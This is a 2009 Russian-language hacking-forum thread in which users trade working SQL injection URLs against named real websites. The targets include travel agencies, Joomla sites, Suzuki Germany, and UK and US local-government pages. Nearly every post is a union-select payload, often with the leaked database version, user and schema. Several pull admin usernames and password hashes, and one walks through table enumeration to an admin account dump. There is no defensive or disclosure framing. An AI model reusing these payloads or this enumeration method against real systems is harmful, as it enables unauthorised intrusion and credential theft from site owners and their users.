ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.06.2009, 22:02
|
|
Познающий
Регистрация: 07.09.2008
Сообщений: 55
Провел на форуме:
163517
Репутация:
57
|
|
Увидел сегодня этот сайт в PHP-инъекциях. Думаю... Посмотрю: может че еще есть... Оказалось, что есть  Да простит меня Adm1n4eG
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database(),@@version_compile_os)/*
VERSION(): 5.0.16
USER(): govor@217.117.80.162
BAZA(): govor
OS(): portbld-freebsd6.0
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,group_concat(table_name)+from +information_schema.tables+where+table_schema%3C%3 E0x696E666F726D6174696F6E5F736368656D61/*
Таблицы:
GAccess,GBase,GBaseImg,GHotLink,GHotel,GHotelImg,G News,GNewsImg,GPlace,GPlaceB,GSeason,GTour,GTourIm g,GType,forum,new,news
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,group_concat(column_name)+fro m+information_schema.columns+where+table_name=0x47 416363657373/*
Колонки в таблице GAccess:
GAcId,GLog,GPass,GIP,GSet
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,group_concat(GAcId,0x3a,GLog, 0x3a,GPass,0x3a,GIP,0x3a,GSet,0x3a)+from+GAccess/*
А вот и долгожданный админ...
Последний раз редактировалось Dobby007; 18.06.2009 в 23:06..
|
|
|
18.06.2009, 22:30
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226
Репутация:
38
|
|
Код:
http://www.aikidoural.ru/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,%20%20username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*
Код:
http://tango.net.ua/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,%20%20username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*
Последний раз редактировалось Flair; 19.06.2009 в 10:51..
|
|
|
|
18.06.2009, 22:37
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226
Репутация:
38
|
|
Код:
http://avtos.su/index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0%20,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*
Код:
http://www.milkoff.ru/index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0%20,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*
|
|
|
|
18.06.2009, 23:14
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
Код:
http://www.suncity-travel.com/index.php?id=34+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11+limit+1,1/*
version():4.0.23a-log
database():suncity
user():scorp@localhost
__
Код:
http://www.mathrubhumi.org/travel/news.php?id=8935+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19
version():5.0.45
database():entravel
user():dedop@localhost
__
Код:
http://www.azores.com/travel/tour.php?id=56+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47++limit+1,1/*
version():5.0.45
database():azoresco
user():azoresco@localhost
__
Код:
http://soloentreamigas.com.ve/articulo.php?ID=60+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*
version():5.0.37-community-log
database():chicas
user():chicas@192.168.1.254
__
Код:
http://www.cavim.com.ve/pub.php?id=40+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18
version():5.0.51a-community-log
database():cavimc_cavim
user():cavimc_sa@localhost
__
Код:
http://epetitions.bristol.gov.uk/petition.php?id=166+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15
version():5.0.60-log
database():bristol_epetitioner
user():epetitioner_user@localhost
Последний раз редактировалось M.W.N.N.; 19.06.2009 в 00:18..
|
|
|
|
19.06.2009, 02:28
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641
Репутация:
8
|
|
http://www.sbrshop.com/store/maincategory.php?maincat_id=-1+union+select+1,username,3,4,5,6,7,8,9,10+from+us ers--
|
|
|
|
19.06.2009, 09:41
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
Код:
http://www.skylinechili.com/st.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6
5.0.45:skyline@localhost:skyline
Код:
http://www.car-stylingparts.com/Show-St.php?id=-6+union+select+1,2,3,concat_Ws(0x3a,version(),user(),database()),5
5.0.77-community-log:carstyl_newdbs@localhost:carstyl_newcardb
Последний раз редактировалось AlexSatter; 19.06.2009 в 09:45..
|
|
|
|
19.06.2009, 09:59
|
|
Познающий
Регистрация: 07.11.2008
Сообщений: 48
Провел на форуме:
465260
Репутация:
19
|
|
http://www.norfolk.gov/News/Press/prdetails.asp?PressID=-1+UNION+SELECT+1,2,3,4,5,@@version,7,8,9,10,11--
Microsoft SQL Server 2005
|
|
|
|
19.06.2009, 10:07
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
http:// nl.sharp.be/php/td.php?par=1108_519_no_1718+and+substring(version( ),1,1)=5
Сузуки оказывается тоже весь в sql-inj
Код:
http://classic.suzuki.de/code/td.php?id=-2006101+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11/*
5.0.32-Debian_7etch5-log:suzuki@localhost:suzuki
Код:
http://www.martin-rowe.com/a.php?id=-38+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6
4.1.22:martinrowe@localhost:martin
Код:
http://www.uaz-upi.com/news/art.php?id=145+and+substring(version(),1,1)=3
Код:
http://www.endocrin.ru/art.php?id=-430+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5
4.0.27-log:endocrin@zvm12.host.ru:endocrin
Код:
http://catalogue.nimk.nl/art.php?id=7231+and+substring(version(),1,1)=5
Код:
http://www.medoded.ru/art.php?id=-72+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9
5.0.32-Debian_7etch10-log:med@localhost:medoded
Код:
http://me.net.ua/art.php?id=402+and+substring(version(),1,1)=5
Код:
http://www.brownsfineart.com/gallery/art.php?ID=-77+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10
4.1.22:browns@localhost:browns_db
Код:
http://www.geopribori.ru/art.php?id=a138+and+substring(version(),1,1)=4
Код:
http://express.fa13.com/art.php?id=-17622+union+selecT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10
4.1.10a:fa13_forum@localhost:fa13_add
Код:
http://www.infoservis.net/region.php?idRegion=3+and+substring(version(),1,1)=5
Последний раз редактировалось AlexSatter; 19.06.2009 в 11:03..
|
|
|
|
19.06.2009, 12:09
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226
Репутация:
38
|
|
Код:
http://www.propheticliving.com//index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*
Код:
http://www.shoprivergate.com//index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*
|
|
|
|
19.06.2009, 14:00
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
http://www.nordhouse.ru/article.php?id=-3'+UNION+SELECT+concat_Ws(0x0b,user(),versio n(),database())+--+
nordhouseru@nordhouse.ru
4.0.26
nordhouseru
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
